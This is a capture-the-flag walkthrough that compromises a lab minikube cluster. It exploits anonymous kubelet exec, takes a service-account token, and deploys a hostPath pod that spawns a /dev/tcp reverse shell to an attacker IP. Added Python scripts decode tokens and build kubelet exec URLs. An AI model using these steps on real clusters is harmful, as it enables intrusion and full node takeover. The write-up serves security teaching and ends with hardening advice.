Service overview

The target's IP address is 10.10.11.133. Let's look at the nmap output:

$ sudo nmap -sS -Pn -p1-65535 -vvv -oN 10.10.11.133 10.10.11.133 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-27 13:59 EDT
Initiating Parallel DNS resolution of 1 host. at 13:59
Completed Parallel DNS resolution of 1 host. at 13:59, 0.02s elapsed
DNS resolution of 1 IPs took 0.02s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 13:59
Scanning 10.10.11.133 [65535 ports]
Discovered open port 22/tcp on 10.10.11.133
Discovered open port 80/tcp on 10.10.11.133
Discovered open port 10250/tcp on 10.10.11.133
SYN Stealth Scan Timing: About 10.42% done; ETC: 14:04 (0:04:26 remaining)
SYN Stealth Scan Timing: About 16.56% done; ETC: 14:05 (0:05:07 remaining)
Discovered open port 8443/tcp on 10.10.11.133
SYN Stealth Scan Timing: About 24.58% done; ETC: 14:05 (0:04:39 remaining)
Discovered open port 10249/tcp on 10.10.11.133
Discovered open port 2380/tcp on 10.10.11.133
SYN Stealth Scan Timing: About 31.98% done; ETC: 14:05 (0:04:17 remaining)
Stats: 0:05:47 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 58.55% done; ETC: 14:08 (0:04:06 remaining)
SYN Stealth Scan Timing: About 65.36% done; ETC: 14:09 (0:03:36 remaining)
SYN Stealth Scan Timing: About 71.92% done; ETC: 14:09 (0:03:03 remaining)
SYN Stealth Scan Timing: About 77.81% done; ETC: 14:10 (0:02:30 remaining)
Discovered open port 10256/tcp on 10.10.11.133
SYN Stealth Scan Timing: About 83.20% done; ETC: 14:10 (0:01:55 remaining)
SYN Stealth Scan Timing: About 89.44% done; ETC: 14:10 (0:01:11 remaining)
Discovered open port 2379/tcp on 10.10.11.133
SYN Stealth Scan Timing: About 94.73% done; ETC: 14:10 (0:00:36 remaining)
Completed SYN Stealth Scan at 14:11, 719.50s elapsed (65535 total ports)
Nmap scan report for 10.10.11.133
Host is up, received user-set (0.17s latency).
Scanned at 2023-07-27 13:59:06 EDT for 719s
Not shown: 65527 closed tcp ports (reset)
PORT      STATE SERVICE     REASON
22/tcp    open  ssh         syn-ack ttl 63
80/tcp    open  http        syn-ack ttl 63
2379/tcp  open  etcd-client syn-ack ttl 63
2380/tcp  open  etcd-server syn-ack ttl 63
8443/tcp  open  https-alt   syn-ack ttl 63
10249/tcp open  unknown     syn-ack ttl 63
10250/tcp open  unknown     syn-ack ttl 63
10256/tcp open  unknown     syn-ack ttl 63

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 719.79 seconds
           Raw packets sent: 68943 (3.033MB) | Rcvd: 106227 (11.882MB)

Web server

The web server greets us with the default nginx page.


Port 8443 is the Kubernetes API server (minikube). The remaining ports are the usual set for a single-node cluster: 2379/2380 are etcd, 10250 is the kubelet, and 10249/10256 are kube-proxy's metrics and health endpoints.

Minikube

Let's keep exploring minikube.


$ curl -k https://10.10.11.133:8443/healthz
ok

Port 10250 is the kubelet API. Anonymous access is enabled on it, so pod information is returned without any authentication:


Install kubeletctl:

wget https://github.com/cyberark/kubeletctl/releases/download/v1.11/kubeletctl_linux_amd64 && mv kubeletctl* kubeletctl && chmod +x kubeletctl

Let's look at the pods more closely:

$ ./kubeletctl pods -s 10.10.11.133 
┌────────────────────────────────────────────────────────────────────────────────┐
│                                Pods from Kubelet                               │
├───┬────────────────────────────────────┬─────────────┬─────────────────────────┤
│   │ POD                                │ NAMESPACE   │ CONTAINERS              │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 1 │ etcd-steamcloud                    │ kube-system │ etcd                    │
│ 2 │ kube-apiserver-steamcloud          │ kube-system │ kube-apiserver          │
│ 3 │ kube-controller-manager-steamcloud │ kube-system │ kube-controller-manager │
│ 4 │ coredns-78fcd69978-rksk2           │ kube-system │ coredns                 │
│ 5 │ nginx                              │ default     │ nginx                   │
│ 6 │ spark-pod                          │ default     │ spark-pod               │
│ 7 │ kube-scheduler-steamcloud          │ kube-system │ kube-scheduler          │
│ 8 │ storage-provisioner                │ kube-system │ storage-provisioner     │
│ 9 │ kube-proxy-wfzq2                   │ kube-system │ kube-proxy              │
└───┴────────────────────────────────────┴─────────────┴─────────────────────────┘

The nginx pod lives in the default namespace rather than kube-system, so it is a workload pod and the natural first target. Let's try running commands in it through the kubelet's exec endpoint:

$ ./kubeletctl exec "id" -p nginx -c nginx -s 10.10.11.133
uid=0(root) gid=0(root) groups=0(root)

Interactive shell:

$ ./kubeletctl exec "/bin/bash" -p nginx -c nginx -s 10.10.11.133
root@nginx:/#

User flag

root@nginx:/# cd /root
root@nginx:~# ls -la
total 12
drwxr-xr-x 2 root root 4096 Nov 30  2021 .
drwxr-xr-x 1 root root 4096 Jul 27 06:26 ..
-rw-r--r-- 2 root root   33 Jul 27 06:25 user.txt
root@nginx:~# cat user.txt
d57a2b97970cab038789e36c97b5a7f7


Token and certificate

Inside the pod we find the service account token and the cluster CA certificate mounted at the usual location:

$ find / -name '*token*'
find: '/proc/8/map_files': Permission denied
/run/secrets/kubernetes.io/serviceaccount/._07_27_18_35_11.210512991/token
/run/secrets/kubernetes.io/serviceaccount/token
$ cd /run/secrets/kubernetes.io/serviceaccount
$ ls -la
total 4
drwxrwxrwt 3 root root  140 Jul 27 18:35 .
drwxr-xr-x 3 root root 4096 Jul 27 06:26 ..
drwxr-xr-x 2 root root  100 Jul 27 18:35 ._07_27_18_35_11.210512991
lrwxrwxrwx 1 root root   31 Jul 27 18:35 ..data -> ._07_27_18_35_11.210512991
lrwxrwxrwx 1 root root   13 Jul 27 06:26 ca.crt -> ..data/ca.crt
lrwxrwxrwx 1 root root   16 Jul 27 06:26 namespace -> ..data/namespace
lrwxrwxrwx 1 root root   12 Jul 27 06:26 token -> ..data/token
$ cat ca.crt
-----BEGIN CERTIFICATE-----
[...]
-----END CERTIFICATE-----
$ cat token
eyJhbGciOiJSUzI1NiIsImtpZCI6IjFVVEhtRUE0NjloTHMyWHNGU1VBTXFHdHhBYTlCS3FtallwTFA0YXllR0EifQ.[...].BI_pOgj5gjsNTHtbytvNUf_KK0z4d4UcwW64K-f4fslWaQNcWz5Q15dbjbcvnSS4wM6M1aOnWGFZfGjEM8btKJP3-bN3Ued2kXE638xiRYnnAm0yaJ5o8J7S2Vk6N5-7gwRGFfrx_VJAR3KgVMU4lqK9GtJ0hPo0tFJWBJF97zNnR_XBppN8R4hx8qELHiwkYSMyyDjaR4T2r34G4c3k1NR0PoU4cxg2o0jnOX2lUmWpH1vIAUHg-zOM5idZjMNBn_2wBTRNNSDquGWySyxocvcNSRlJTjF7TF4ptv7OC2cF3d974MHD1_LhQ2bSPRpiZOWsU39IFHOslsMaWoO1Fg
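
The payload of that token is cut off above, but decoding it is the first thing to do with any service-account token you pick up: no signature check is needed, since we only want to read which identity the token carries (the API server is what verifies it). The claims tell you the namespace, the service account and, for projected tokens, the pod the token is bound to and when it expires. The following Python is an added example, not code from the write-up: it decodes the header segment exactly as printed on the page and a constructed payload in kube-apiserver's bound-token layout; the claim values (service account `default`, the uids, the timestamps) are hypothetical.

```python
import base64
import json

# Header segment copied from the token shown on the page. Its payload and
# signature are truncated in the write-up, so the claims below are a
# CONSTRUCTED stand-in in the layout kube-apiserver uses for projected
# (bound) service-account tokens; every value in them is hypothetical.
PAGE_HEADER_SEGMENT = (
    "eyJhbGciOiJSUzI1NiIsImtpZCI6IjFVVEhtRUE0NjloTHMyWHNGU1VBTXFHdHhBYTlCS3FtallwTFA0YXllR0EifQ"
)

SAMPLE_BOUND_CLAIMS = {
    "aud": ["https://kubernetes.default.svc.cluster.local"],
    "exp": 1721990000,
    "iat": 1690454000,
    "iss": "https://kubernetes.default.svc.cluster.local",
    "kubernetes.io": {
        "namespace": "default",
        "pod": {"name": "nginx", "uid": "46abbdba-233c-49be-ba6f-06f3c153f6ce"},
        "serviceaccount": {"name": "default", "uid": "11111111-2222-3333-4444-555555555555"},
    },
    "nbf": 1690454000,
    "sub": "system:serviceaccount:default:default",
}


def b64url_decode(segment):
    """JWT segments drop base64 padding; restore it before decoding."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def b64url_encode(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def make_token(claims, header_segment=PAGE_HEADER_SEGMENT):
    """Assemble a sample compact JWS for offline use. The signature is a
    dummy: this token would never validate against the cluster's key."""
    payload = b64url_encode(json.dumps(claims).encode())
    return ".".join([header_segment, payload, b64url_encode(b"dummy-signature")])


SAMPLE_TOKEN = make_token(SAMPLE_BOUND_CLAIMS)


def decode_jwt_unverified(token):
    """Return (header, claims) WITHOUT verifying the signature.

    That is acceptable here: we are inspecting a token we already hold to
    learn which identity it represents. Authorisation is still decided by
    the API server, which does verify it."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("expected a compact JWS with three dot-separated segments")
    return json.loads(b64url_decode(parts[0])), json.loads(b64url_decode(parts[1]))


def summarize_sa_token(token):
    """Pull the identity out of a Kubernetes service-account JWT.

    Handles both layouts: bound tokens nest everything under the
    "kubernetes.io" claim; legacy secret-based tokens use flat
    "kubernetes.io/serviceaccount/..." claims and carry no expiry."""
    header, claims = decode_jwt_unverified(token)
    bound = claims.get("kubernetes.io") or {}
    return {
        "alg": header.get("alg"),
        "kid": header.get("kid"),
        "subject": claims.get("sub"),
        "namespace": bound.get("namespace")
        or claims.get("kubernetes.io/serviceaccount/namespace"),
        "serviceaccount": (bound.get("serviceaccount") or {}).get("name")
        or claims.get("kubernetes.io/serviceaccount/service-account.name"),
        "pod": (bound.get("pod") or {}).get("name"),
        "bound": "kubernetes.io" in claims,
        "expires": claims.get("exp"),
        "audience": claims.get("aud"),
    }


if __name__ == "__main__":
    for key, value in summarize_sa_token(SAMPLE_TOKEN).items():
        print(f"{key:15} {value}")
```

To run it against the real token, pass the contents of the `token` file to `summarize_sa_token` instead of `SAMPLE_TOKEN`. A legacy (secret-backed) token will report `bound: False` and no expiry, which matters operationally: such a token stays valid until the secret is deleted, whereas a bound token dies with the pod or at `exp`.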

Save the certificate to a file ca.crt and the token into the TOKEN variable. With the CA certificate kubectl can verify the API server's TLS certificate instead of skipping verification, and we can run:

$ kubectl --server https://10.10.11.133:8443 --certificate-authority=ca.crt --token=$TOKEN get pod
NAME        READY   STATUS    RESTARTS   AGE
nginx       1/1     Running   0          12h
spark-pod   1/1     Running   0          12h

The permissions the API server grants this set of credentials are:

$ kubectl auth can-i --list --server https://10.10.11.133:8443 --certificate-authority=ca.crt --token=$TOKEN
Resources                                       Non-Resource URLs                     Resource Names   Verbs
selfsubjectaccessreviews.authorization.k8s.io   []                                    []               [create]
selfsubjectrulesreviews.authorization.k8s.io    []                                    []               [create]
pods                                            []                                    []               [get create list]
                                                [/.well-known/openid-configuration]   []               [get]
                                                [/api/*]                              []               [get]
                                                [/api]                                []               [get]
                                                [/apis/*]                             []               [get]
                                                [/apis]                               []               [get]
                                                [/healthz]                            []               [get]
                                                [/healthz]                            []               [get]
                                                [/livez]                              []               [get]
                                                [/livez]                              []               [get]
                                                [/openapi/*]                          []               [get]
                                                [/openapi]                            []               [get]
                                                [/openid/v1/jwks]                     []               [get]
                                                [/readyz]                             []               [get]
                                                [/readyz]                             []               [get]
                                                [/version/]                           []               [get]
                                                [/version/]                           []               [get]
                                                [/version]                            []               [get]
                                                [/version]                            []               [get]

The interesting entry is pods with the create verb: this token can create pods in the default namespace. Before using that, let's look at how the existing nginx pod is defined:

$ kubectl get pod nginx -o yaml --server https://10.10.11.133:8443 --certificate-authority=ca.crt --token=$TOKEN
apiVersion: v1
kind: Pod
metadata:
  annotations:
    kubectl.kubernetes.io/last-applied-configuration: |
      {"apiVersion":"v1","kind":"Pod","metadata":{"annotations":{},"name":"nginx","namespace":"default"},"spec":{"containers":[{"image":"nginx:1.14.2","imagePullPolicy":"Never","name":"nginx","volumeMounts":[{"mountPath":"/root","name":"flag"}]}],"volumes":[{"hostPath":{"path":"/opt/flag"},"name":"flag"}]}}
  creationTimestamp: "2023-07-27T06:26:02Z"
  name: nginx
  namespace: default
  resourceVersion: "494"
  uid: 46abbdba-233c-49be-ba6f-06f3c153f6ce
spec:
  containers:
  - image: nginx:1.14.2
  [...]

The last-applied-configuration annotation tells us what we need: the pod uses imagePullPolicy Never, so images are only available locally (any pod we create must reuse an image the node already has, such as nginx:1.14.2), and /root inside the container is a hostPath volume pointing at /opt/flag on the node. That is exactly the primitive we will reuse next, pointed at / instead of /opt/flag.

Since the service account can create pods and hostPath volumes are evidently allowed in this cluster, let's deploy our own pod that mounts the node's root filesystem under /mnt and spawns a reverse shell. hostNetwork: true additionally puts the container in the node's network namespace, which is why the shell's hostname below is steamcloud rather than the pod name:

$ nano rev.yaml
apiVersion: v1
kind: Pod
metadata:
  name: rev
  namespace: default
spec:
  containers:
  - name: rev
    image: nginx:1.14.2
    command: ["/bin/bash"]
    args: ["-c", "/bin/bash -i >& /dev/tcp/10.10.16.93/4242 0>&1"]
    volumeMounts:
    - mountPath: /mnt
      name: hostfs
  volumes:
  - name: hostfs
    hostPath:
      path: /
  automountServiceAccountToken: true
  hostNetwork: true
$ rlwrap nc -lnvp 4242
# in another terminal, deploy the pod
$ kubectl apply -f rev.yaml --server https://10.10.11.133:8443 --certificate-authority=ca.crt --token=$TOKEN
pod/rev created
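
An added example, not code from the write-up or from kubeletctl, that covers both the pod enumeration against port 10250 above and the hostPath pod just deployed: a triage script for the kubelet's /pods response. It lists every pod with its namespace and containers, separates workload pods from kube-system ones, flags the host-escape primitives in each spec (hostPath volumes, hostNetwork/hostPID/hostIPC, privileged containers), and builds the kubelet /run URL for each container. The PodList it runs on is constructed in the shape of the kubelet's response; the host 10.10.11.133 and port 10250 are from the page, every other value is sample data.

```python
import json
from urllib.parse import quote

# CONSTRUCTED sample in the shape of the kubelet's /pods response (a v1
# PodList), trimmed to the fields the triage reads. The "nginx" entry mirrors
# the last-applied-configuration annotation shown earlier, "rev" mirrors
# rev.yaml, and the other two stand in for the rest of the pod list.
SAMPLE_PODLIST = json.loads(r"""
{
  "kind": "PodList",
  "apiVersion": "v1",
  "items": [
    {"metadata": {"name": "kube-apiserver-steamcloud", "namespace": "kube-system"},
     "spec": {"hostNetwork": true,
              "containers": [{"name": "kube-apiserver"}],
              "volumes": [{"name": "k8s-certs", "hostPath": {"path": "/var/lib/minikube/certs"}}]}},
    {"metadata": {"name": "nginx", "namespace": "default"},
     "spec": {"containers": [{"name": "nginx", "image": "nginx:1.14.2",
                              "volumeMounts": [{"mountPath": "/root", "name": "flag"}]}],
              "volumes": [{"name": "flag", "hostPath": {"path": "/opt/flag"}}]}},
    {"metadata": {"name": "spark-pod", "namespace": "default"},
     "spec": {"containers": [{"name": "spark-pod"}]}},
    {"metadata": {"name": "rev", "namespace": "default"},
     "spec": {"hostNetwork": true,
              "containers": [{"name": "rev", "image": "nginx:1.14.2",
                              "volumeMounts": [{"mountPath": "/mnt", "name": "hostfs"}]}],
              "volumes": [{"name": "hostfs", "hostPath": {"path": "/"}}]}}
  ]
}
""")

SYSTEM_NAMESPACES = ("kube-system",)


def kubelet_run_url(host, namespace, pod, container, cmd="id", port=10250):
    """The kubelet's legacy /run endpoint: POST here to execute cmd in a
    container. The kubelet reads `cmd` from the query string, so it is
    URL-encoded into the URL rather than sent in the body."""
    return f"https://{host}:{port}/run/{namespace}/{pod}/{container}?cmd={quote(cmd, safe='')}"


def triage_pod(pod):
    """Describe one pod and list the host-escape primitives its spec grants."""
    meta, spec = pod["metadata"], pod.get("spec", {})
    findings = []
    for flag in ("hostNetwork", "hostPID", "hostIPC"):
        if spec.get(flag):
            findings.append(flag)
    for vol in spec.get("volumes", []):
        host_path = vol.get("hostPath")
        if host_path:
            findings.append("hostPath:" + host_path.get("path", "?"))
    for ctr in spec.get("containers", []):
        if (ctr.get("securityContext") or {}).get("privileged"):
            findings.append("privileged:" + ctr["name"])
    return {
        "namespace": meta["namespace"],
        "name": meta["name"],
        "system": meta["namespace"] in SYSTEM_NAMESPACES,
        "containers": [ctr["name"] for ctr in spec.get("containers", [])],
        "findings": findings,
        # A hostPath of "/" is a full node filesystem mount, as in rev.yaml.
        "mounts_host_root": "hostPath:/" in findings,
    }


def triage_podlist(podlist, host):
    rows = []
    for pod in podlist.get("items", []):
        row = triage_pod(pod)
        row["run_urls"] = {
            c: kubelet_run_url(host, row["namespace"], row["name"], c) for c in row["containers"]
        }
        rows.append(row)
    return rows


def workload_targets(rows):
    """Non-system pods, sorted: the ones to exec into first, since their
    service-account tokens are the ones worth taking to the API server."""
    return sorted((r for r in rows if not r["system"]), key=lambda r: (r["namespace"], r["name"]))


if __name__ == "__main__":
    rows = triage_podlist(SAMPLE_PODLIST, "10.10.11.133")
    for r in rows:
        kind = "system  " if r["system"] else "workload"
        print(f"{kind} {r['namespace']}/{r['name']:28} {','.join(r['containers']):16} {r['findings']}")
    for r in workload_targets(rows):
        for url in r["run_urls"].values():
            print("curl -ks -X POST", repr(url))
```

Against a live kubelet, replace SAMPLE_PODLIST with `json.loads` of the output of `curl -ks https://10.10.11.133:10250/pods` and POST to the printed URLs. Read from the defender's side, the same findings map onto the baseline Pod Security Standard, which rejects hostPath volumes, hostNetwork/hostPID/hostIPC and privileged containers: enforcing it on the default namespace would have blocked rev.yaml, and starting the kubelet with anonymous authentication disabled would have closed the enumeration step that made the nginx pod reachable in the first place.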


Root flag

root@steamcloud:~$ cd /mnt/root
root@steamcloud:/mnt/root$ ls -la
total 28
drwx------  4 root root 4096 Jan 10  2022 .
drwxr-xr-x 18 root root 4096 Dec  1  2021 ..
lrwxrwxrwx  1 root root    9 Nov 30  2021 .bash_history -> /dev/null
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
drwxr-x---  3 root root 4096 Nov 30  2021 .kube
drwxr-xr-x 10 root root 4096 Nov 30  2021 .minikube
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   33 Jul 27 06:25 root.txt
root@steamcloud:/mnt/root$ id
uid=0(root) gid=0(root) groups=0(root)
root@steamcloud:/mnt/root$ cat root.txt
88198981631135b8052adf47c90bf589
